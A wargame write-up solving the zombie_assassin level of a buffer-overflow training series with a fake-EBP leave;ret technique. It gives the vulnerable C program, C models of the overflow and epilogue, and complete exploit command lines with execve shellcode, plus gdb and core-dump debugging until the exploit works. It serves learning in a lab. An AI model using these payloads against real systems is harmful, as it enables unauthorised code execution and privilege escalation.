[lob] assassin -> zombie_assassin

2022. 9. 16. 16:14·Wargame/Hackerchool

1. intro

2. Code and analysis

2.1. C code

/*
        The Lord of the BOF : The Fellowship of the BOF
        - zombie_assassin
        - FEBP
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strncpy */

int main(int argc, char *argv[])
{
        char buffer[40];

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        if(argv[1][47] == '\xbf')
        {
                printf("stack retbayed you!\n");
                exit(0);
        }

        if(argv[1][47] == '\x40')
        {
                printf("library retbayed you, too!!\n");
                exit(0);
        }

        // strncpy instead of strcpy!
        strncpy(buffer, argv[1], 48);
        printf("%s\n", buffer);
        return 0;
}

2.2. Analysis

Same as the previous level, except that the copy into buffer is now done with strncpy, so only the number of bytes copied differs.

3. Vulnerability check and attack preparation

3.1. Vulnerability

The return address can be tampered with... I'm getting too lazy even to write this up, lol.

However, because the copy stops exactly at the return address, the ret gadget approach no longer works here.
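To make the "copy stops at the return address" point concrete, here is an added example that is not part of the original writeup. It models the 40-byte buffer with the sfp and return-address slots behind it, runs the challenge's strncpy(..., 48) next to a copy bounded by the destination size, and reproduces the two byte-47 guards. The frame layout, the sentinel values and the probe input are constructed for the model; only the 48-byte bound, the 0xbf/0x40 checks and the main+159 address come from the page.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Model of main()'s frame in zombie_assassin on a 32-bit little-endian
 * stack: the 40-byte buffer is followed directly by the saved frame
 * pointer (sfp) and the saved return address, the order seen in the gdb
 * dump on the page. Sentinel values are constructed for this model. */
struct frame {
    char buffer[40];
    uint32_t sfp;
    uint32_t ret;
};

#define SFP_SENTINEL 0x11111111u   /* constructed stand-in for the saved ebp */
#define RET_SENTINEL 0x22222222u   /* constructed stand-in for the return address */

/* The copy as the challenge performs it: the bound is the constant 48,
 * not the destination size, so strncpy also writes bytes 40..47 (sfp
 * and ret) and then stops. Those two slots, and nothing past them, are
 * what the input can change. */
static void copy_as_challenge(struct frame *f, const char *input)
{
    strncpy((char *)f, input, 48);
}

/* Hardened copy: bound by the destination and always terminated, since
 * strncpy leaves the buffer unterminated when the source has n or more bytes. */
static void copy_hardened(struct frame *f, const char *input)
{
    strncpy(f->buffer, input, sizeof(f->buffer) - 1);
    f->buffer[sizeof(f->buffer) - 1] = '\0';
}

/* A 48-byte input shaped like the page's first probe: 40 filler bytes,
 * then a 4-byte sfp value and a 4-byte ret value in little-endian order. */
static void build_input(char out[49], uint32_t sfp, uint32_t ret)
{
    int i;
    memset(out, 'A', 40);
    for (i = 0; i < 4; i++) {
        out[40 + i] = (char)(sfp >> (8 * i));
        out[44 + i] = (char)(ret >> (8 * i));
    }
    out[48] = '\0';
}

struct probe {
    size_t changed;   /* how many of the 8 bytes behind the buffer were altered */
    uint32_t sfp;     /* sfp slot after the copy */
    uint32_t ret;     /* ret slot after the copy */
};

/* Run one copy (challenge or hardened) into a fresh frame and report
 * what happened to the two slots behind the buffer. */
static struct probe run_probe(int hardened, uint32_t sfp_in, uint32_t ret_in)
{
    char input[49];
    struct frame f;
    const unsigned char *tail = (const unsigned char *)&f + sizeof(f.buffer);
    unsigned char before[8];
    struct probe p = {0, 0, 0};
    size_t i;

    build_input(input, sfp_in, ret_in);
    memset(&f, 0, sizeof f);
    f.sfp = SFP_SENTINEL;
    f.ret = RET_SENTINEL;
    memcpy(before, tail, sizeof before);

    if (hardened)
        copy_hardened(&f, input);
    else
        copy_as_challenge(&f, input);

    for (i = 0; i < sizeof before; i++)
        p.changed += (before[i] != tail[i]);
    p.sfp = f.sfp;
    p.ret = f.ret;
    return p;
}

/* The two guards from the challenge inspect only byte 47, the most
 * significant byte of the little-endian return address, rejecting 0xbf
 * (stack) and 0x40 (shared library). Returns 1 when an input carrying
 * `ret` would reach the copy. */
static int ret_guard_allows(uint32_t ret)
{
    char input[49];
    build_input(input, 0, ret);
    return !(input[47] == '\xbf' || input[47] == '\x40');
}

int main(void)
{
    struct probe p = run_probe(0, 0x42424242u, 0x43434343u);   /* "BBBB", "CCCC" */
    printf("challenge copy: %zu bytes changed, sfp=%#x ret=%#x\n", p.changed, p.sfp, p.ret);
    p = run_probe(1, 0x42424242u, 0x43434343u);
    printf("hardened copy:  %zu bytes changed, sfp=%#x ret=%#x\n", p.changed, p.sfp, p.ret);
    /* A .text address such as main+159 passes both guards; a stack address does not. */
    printf("guard passes 0x080484df: %d\n", ret_guard_allows(0x080484dfu));
    printf("guard passes 0xbffffc08: %d\n", ret_guard_allows(0xbffffc08u));
    return 0;
}
```

The guards are a blocklist on one byte of one slot, so any return target whose top byte is neither 0xbf nor 0x40 (the program's own .text at 0x08xxxxxx, for instance) goes through untouched. The bounded copy removes the write itself, which is the fix; the guards only narrow which values the write may carry.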

 

3.2. Attack preparation

Let's think once more about what happens when the program exits.

On leave, ebp is restored; on ret, a value is loaded into eip and execution jumps there (jmp eip).

In assembly terms, leave is

mov esp, ebp    ; esp = ebp
pop ebp         ; ebp = [esp], esp += 4

and ret is, informally,

pop eip         ; eip = [esp], esp += 4
jmp eip

So if, in main's epilogue, a chosen value is placed into ebp, that is, into the sfp, and a leave & ret gadget is put in the return-address slot, then ebp gets set once more and the value following that address becomes the return address.
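As an added illustration, not from the original post, the following C model executes leave and ret on a toy 32-bit stack: first main's own epilogue, and then, when the popped return address is the leave;ret gadget, the gadget's epilogue. The memory window, the frame addresses, the dummy ebp and the target value are constructed for the model; the gadget address 0x080484df (main+159) and the slot order (sfp, then return address) follow the page, and the leave/ret semantics are the real ones.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Toy model of the x86-32 function epilogue described above. MEM_BASE,
 * MEM_SIZE and every frame address below are constructed for the model. */
#define MEM_BASE 0xbffffbc0u
#define MEM_SIZE 0x60u
#define GADGET_LEAVE_RET 0x080484dfu   /* main+159 on the page: leave; ret */

struct machine {
    uint32_t esp, ebp, eip;
    uint8_t mem[MEM_SIZE];             /* bytes MEM_BASE .. MEM_BASE+MEM_SIZE-1 */
};

static uint32_t load32(const struct machine *m, uint32_t addr)
{
    const uint8_t *p = m->mem + (addr - MEM_BASE);
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

static void store32(struct machine *m, uint32_t addr, uint32_t v)
{
    uint8_t *p = m->mem + (addr - MEM_BASE);
    p[0] = (uint8_t)v;
    p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16);
    p[3] = (uint8_t)(v >> 24);
}

/* leave:  esp = ebp; ebp = [esp]; esp += 4 */
static void op_leave(struct machine *m)
{
    m->esp = m->ebp;
    m->ebp = load32(m, m->esp);
    m->esp += 4;
}

/* ret:  eip = [esp]; esp += 4 */
static void op_ret(struct machine *m)
{
    m->eip = load32(m, m->esp);
    m->esp += 4;
}

/* Write a frame at ebp_addr: [ebp_addr] = saved ebp, [ebp_addr+4] = return
 * address. These two words are all the overflow on the page can reach. */
static void place_frame(struct machine *m, uint32_t ebp_addr, uint32_t saved_ebp, uint32_t ret)
{
    store32(m, ebp_addr, saved_ebp);
    store32(m, ebp_addr + 4, ret);
}

/* Run main's epilogue; if the popped return address is the leave;ret
 * gadget, run one more leave;ret exactly as the gadget would. Returns
 * the eip execution would continue from. */
static uint32_t run_epilogues(struct machine *m)
{
    op_leave(m);
    op_ret(m);
    if (m->eip == GADGET_LEAVE_RET) {
        op_leave(m);
        op_ret(m);
    }
    return m->eip;
}

/* Untouched frame: saved ebp and return address are the caller's own
 * (constructed values here), and control simply returns to the caller. */
static uint32_t final_eip_clean(void)
{
    struct machine m;
    memset(&m, 0, sizeof m);
    m.ebp = 0xbffffbf4u;                 /* constructed: main's sfp slot */
    m.esp = m.ebp - 40;                  /* the 40-byte buffer sits below it */
    place_frame(&m, m.ebp, 0xbffffc38u, 0x400309cbu);
    return run_epilogues(&m);
}

/* Overwritten frame laid out as the page describes: the sfp slot points at
 * a second frame placed right after the real return-address slot, the real
 * return-address slot holds the gadget, and the second frame's own
 * return-address slot holds `target`. */
static uint32_t final_eip_with_fake_frame(uint32_t target)
{
    struct machine m;
    const uint32_t main_ebp = 0xbffffbf4u;
    const uint32_t fake_ebp = main_ebp + 8;
    memset(&m, 0, sizeof m);
    m.ebp = main_ebp;
    m.esp = main_ebp - 40;
    place_frame(&m, main_ebp, fake_ebp, GADGET_LEAVE_RET);
    place_frame(&m, fake_ebp, 0x44444444u, target);   /* "DDDD" dummy ebp, then target */
    return run_epilogues(&m);
}

int main(void)
{
    printf("clean epilogue continues at      %#x\n", final_eip_clean());
    printf("fake-frame epilogue continues at %#x\n", final_eip_with_fake_frame(0xbffffc08u));
    return 0;
}
```

The model makes the weakness of the byte-47 guards visible: the value in main's real return-address slot is a .text address and passes the check, while the address execution actually continues from lives in a slot the guard never examines. Only bounding the copy to the destination size, as the hardened variant earlier does, removes the write entirely.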

 

So, writing out the payload, it looks like this:

dummy 40 bytes + sfp (actual ret - 4 bytes, i.e. the address of the fake ebp) 4 bytes + ret (leave; ret gadget) 4 bytes
+ dummy (fake ebp) 4 bytes + ret (address of the actual ret value, fake ebp + 4) 4 bytes + actual ret value 4 bytes + nop sled & shellcode

Starting with the gadget, main's own should do.

0x80484df <main+159>:   leave
0x80484e0 <main+160>:   ret

Writing a rough payload and checking the actual addresses gives the following.

(gdb) r `python -c 'print "A"*40 + "BBBB" + "\xdf\x84\x04\x08" + "CCCC" + "DDDD" + "EEEE" + "\x90"*0x30 + "\x31\xc0\x89\xc2\x89\xc1\x50\x68\x70\x61\x73\x73\x68\x2f\x6d\x79\x2d\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"'`
Starting program: /home/assassin/zombie_assassia `python -c 'print "A"*40 + "BBBB" + "\xdf\x84\x04\x08" + "CCCC" + "DDDD" + "EEEE" + "\x90"*0x30 + "\x31\xc0\x89\xc2\x89\xc1\x50\x68\x70\x61\x73\x73\x68\x2f\x6d\x79\x2d\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"'`
/bin/bash2: /home/bugbear/.bashrc: Permission denied
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB߄

Program received signal SIGSEGV, Segmentation fault.
0x80484df in main ()
(gdb) x/40x $esp - 40
....
0xbffffbd8:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffffbe8:     0x41414141      0x41414141      0x41414141      0x42424242
0xbffffbf8:     0x080484df      0x43434343      0x44444444      0x45454545
0xbffffc08:     0x90909090      0x90909090      0x90909090      0x90909090

4. exploit

Write the payload based on the above and try it.

(gdb) r  `python -c 'print "A"*40 + "\xfc\xfb\xff\xbf" + "\xdf\x84\x04\x08" + "DDDD" + "\x08\xfc\xff\xbf" + "\x0c\xfc\xff\xbf" + "\x90"*0x30 + "\x31\xc0\x89\xc2\x89\xc1\x50\x68\x70\x61\x73\x73\x68\x2f\x6d\x79\x2d\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"'`
Starting program: /home/assassin/zombie_assassia `python -c 'print "A"*40 + "\xfc\xfb\xff\xbf" + "\xdf\x84\x04\x08" + "DDDD" + "\x08\xfc\xff\xbf" + "\x0c\xfc\xff\xbf" + "\x90"*0x30 + "\x31\xc0\x89\xc2\x89\xc1\x50\x68\x70\x61\x73\x73\x68\x2f\x6d\x79\x2d\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"'`
/bin/bash2: /home/bugbear/.bashrc: Permission denied
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA▒▒▒▒߄

Program received signal SIGINT, Interrupt.
0xbffffc0c in ?? ()
(gdb) c
Continuing.

Program received signal SIGTRAP, Trace/breakpoint trap.
0x40001990 in _start () at rtld.c:142
142     rtld.c: No such file or directory.
(gdb) c
Continuing.
euid = 515
pushing me away

It works in gdb, but not against the real binary.

[assassin@localhost assassin]$ ./zombie_assassia `python -c 'print "A"*40 + "\xfc\xfb\xff\xbf" + "\xdf\x84\x04\x08" + "DDDD" + "\x08\xfc\xff\xbf" + "\x0c\xfc\xff\xbf" + "\x90"*0x30 + "\x31\xc0\x89\xc2\x89\xc1\x50\x68\x70\x61\x73\x73\x68\x2f\x6d\x79\x2d\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA▒▒▒▒߄
Segmentation fault (core dumped)

Let's dig into the core file.

[assassin@localhost assassin]$ gdb -c core
...
Program terminated with signal 11, Segmentation fault.
#0  0x90909090 in ?? ()
...
(gdb) x/40x $esp-41
0xbffffbdb:     0x41414141      0x41414141      0x41414141      0xbffffbfc
0xbffffbeb:     0x080484df      0x44444444      0xbffffc08      0xbffffc0c
0xbffffbfb:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc0b:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc1b:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc2b:     0xc289c031      0x6850c189      0x73736170      0x796d2f68
0xbffffc3b:     0x622f682d      0xe3896e69      0x80cd0bb0      0x44575000
0xbffffc4b:     0x6f682f3d      0x612f656d      0x73617373      0x006e6973
0xbffffc5b:     0x4f4d4552      0x4f484554      0x313d5453      0x312e3239
0xbffffc6b:     0x312e3836      0x00312e37      0x54534f48      0x454d414e

Fix it based on this and retry.

[assassin@localhost assassin]$ ./zombie_assassia `python -c 'print "A"*40 + "\xf3\xfb\xff\xbf" + "\xdf\x84\x04\x08" + "DDDD" + "\xf7\xfb\xff\xbf" + "\xfa\xfb\xff\xbf" + "\x90"*0x30 + "\x31\xc0\x89\xc2\x89\xc1\x50\x68\x70\x61\x73\x73\x68\x2f\x6d\x79\x2d\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA▒▒▒▒߄
euid = 515
pushing me away
[assassin@localhost assassin]$ ./zombie_assassin `python -c 'print "A"*40 + "\xf3\xfb\xff\xbf" + "\xdf\x84\x04\x08" + "DDDD" + "\xf7\xfb\xff\xbf" + "\xfa\xfb\xff\xbf" + "\x90"*0x30 + "\x31\xc0\x89\xc2\x89\xc1\x50\x68\x70\x61\x73\x73\x68\x2f\x6d\x79\x2d\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA▒▒▒▒߄
euid = 516
no place to hide
License: Attribution-NonCommercial-NoDerivatives
Author: wyv3rn